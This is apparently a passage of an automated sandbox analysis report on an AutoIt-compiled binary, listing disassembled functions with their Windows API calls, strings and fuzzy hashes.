                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 791e9f8a2e048618d9b581ffe6739b6a61d4471f7fbd97851bef447f47aff91c
                                                          • Instruction ID: 752d5781127f42323920e64945a8929aca6b242e973b117eda00b0deceb6cdd8
                                                          • Opcode Fuzzy Hash: 791e9f8a2e048618d9b581ffe6739b6a61d4471f7fbd97851bef447f47aff91c
                                                          • Instruction Fuzzy Hash: 94012475641228BBCB24EBA4CC819FE736CEF01320F100A19F871572E1DE31990DEA60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock_memmove
                                                          • String ID: EA06
                                                          • API String ID: 1988441806-3962188686
                                                          • Opcode ID: 6a447493de7b3a9ec5ed8b000283d6914536bcab13a15227d50959b95f2434a6
                                                          • Instruction ID: a1fddc9dfb2f59374a68870dc9e2735ea90e9878f03fb1e746ff5d805e1c550b
                                                          • Opcode Fuzzy Hash: 6a447493de7b3a9ec5ed8b000283d6914536bcab13a15227d50959b95f2434a6
                                                          • Instruction Fuzzy Hash: DD01F971D042187EDB18DAA8C816EFE7BF8DB11301F00419EF553D2181E8B4A6089760
                                                          APIs
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                            • Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00CB8D6B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: fceef5cfabb796f531ba12a648404bdcdb3609d0a41669ada57d13302dd62c69
                                                          • Instruction ID: 1003cdebd23236d25e985e07fbe5283cc410fd9fe66ad68d6670ad97edaec166
                                                          • Opcode Fuzzy Hash: fceef5cfabb796f531ba12a648404bdcdb3609d0a41669ada57d13302dd62c69
                                                          • Instruction Fuzzy Hash: AF01DF71A41109BBCF25EBA0C992AFE73AC9F25300F10041AB842672E1DE215E0CE671
                                                          APIs
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                            • Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00CB8DEE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: c9ceeaa6b6be1e06b741db9722a147bb1efe0ba37e2a24d2f05e61df8a5e059a
                                                          • Instruction ID: 2cf1e78f0d8e18aafa98ecf862fbc288b1a4b178bcbb4e71b204133edefb5083
                                                          • Opcode Fuzzy Hash: c9ceeaa6b6be1e06b741db9722a147bb1efe0ba37e2a24d2f05e61df8a5e059a
                                                          • Instruction Fuzzy Hash: 5401A271A41109BBDF25EBA4C982AFE77AC9F21300F10051AB84563292DE254E0DE671
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: 32865407a9a6757b5576c878332137dac6c4f2fb11a2b22cb15d34970ebe2dc1
                                                          • Instruction ID: 36af4aaed14d0101dfe4a99b3e0902e1ebe9fc63dce19dcff4fd087dfaf9f63a
                                                          • Opcode Fuzzy Hash: 32865407a9a6757b5576c878332137dac6c4f2fb11a2b22cb15d34970ebe2dc1
                                                          • Instruction Fuzzy Hash: 72E09B325003282AD7209695AC45FE7FBACDB55B60F00015AFD04D6151D9709B4587E0
                                                          APIs
                                                            • Part of subcall function 00C9B314: _memset.LIBCMT ref: 00C9B321
                                                            • Part of subcall function 00C80940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C9B2F0,?,?,?,00C6100A), ref: 00C80945
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00C6100A), ref: 00C9B2F4
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C6100A), ref: 00C9B303
                                                          Strings
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C9B2FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                          • API String ID: 3158253471-631824599
                                                          • Opcode ID: 529c285be82967ed6a71a28a4402719f61b50ad1da88c33387a68969a6029638
                                                          • Instruction ID: b6ebc3077bf743fbfac6078b6f4fea5a8d79c547db11fb99de4a4fa4ee0c49fc
                                                          • Opcode Fuzzy Hash: 529c285be82967ed6a71a28a4402719f61b50ad1da88c33387a68969a6029638
                                                          • Instruction Fuzzy Hash: CFE06DB02007409FDB20DF28E50C7567AE4BF00704F00896CE49AC73A0EBB4D949CBB1
                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CB7C82
                                                            • Part of subcall function 00C83358: _doexit.LIBCMT ref: 00C83362
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Message_doexit
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 1993061046-4017498283
                                                          • Opcode ID: 93d36edfcadfd6b69f8879e898b8e6909bb47794f94e1a6c0f4cee3254bce9e1
                                                          • Instruction ID: a77fd61be914f9ccc935fc8a4b748046b777677e89e9e96408f59a6591c47412
                                                          • Opcode Fuzzy Hash: 93d36edfcadfd6b69f8879e898b8e6909bb47794f94e1a6c0f4cee3254bce9e1
                                                          • Instruction Fuzzy Hash: A7D05B323C836877D15532A5AC47FDE7A484F05F56F140429FF145A5E34DD1498152FD
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00CA1775
                                                            • Part of subcall function 00CDBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00CA195E,?), ref: 00CDBFFE
                                                            • Part of subcall function 00CDBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CDC010
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00CA196D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                          • String ID: WIN_XPe
                                                          • API String ID: 582185067-3257408948
                                                          • Opcode ID: 9a8e6af58154872372696034a706d700c32cbcb111879389025c58d3b712e264
                                                          • Instruction ID: 7955bc2ec3bfecfc29d3cfb4cbdfd52ef39b6948b005aec3a9dbff8a1167be2c
                                                          • Opcode Fuzzy Hash: 9a8e6af58154872372696034a706d700c32cbcb111879389025c58d3b712e264
                                                          • Instruction Fuzzy Hash: 37F0C97080410ADFDB25DB91CAC8BECBBF8AB19305F582099E512E61A0D7718F85DF60
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CE59AE
                                                          • PostMessageW.USER32(00000000), ref: 00CE59B5
                                                            • Part of subcall function 00CC5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC52BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 2bc0c83e90ba9d95484ac52031fb254d196ba2a7cf4bf34a823e6c33f65a8137
                                                          • Instruction ID: fd04a3df0da64ac245df188a0c9667fffdc7fa6c2047f4b3078d698af9db0030
                                                          • Opcode Fuzzy Hash: 2bc0c83e90ba9d95484ac52031fb254d196ba2a7cf4bf34a823e6c33f65a8137
                                                          • Instruction Fuzzy Hash: 14D0C9713853517BE664AB70AC8BFDA6A55AB54B51F000829B245AE1D0C9E0A841C664
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CE596E
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CE5981
                                                            • Part of subcall function 00CC5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC52BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 7cfe6154136ee5e40e571de2ad823f2fe747fc3da70f104d85bf366a05111405
                                                          • Instruction ID: b300a34faac786e6c402008e2248939387f619fa41a64bbe6545324ce0a70a21
                                                          • Opcode Fuzzy Hash: 7cfe6154136ee5e40e571de2ad823f2fe747fc3da70f104d85bf366a05111405
                                                          • Instruction Fuzzy Hash: 9FD0C971384351BBE664AB70AC8BFDA6A55AB50B51F000829B249AE1D0C9E0A841C664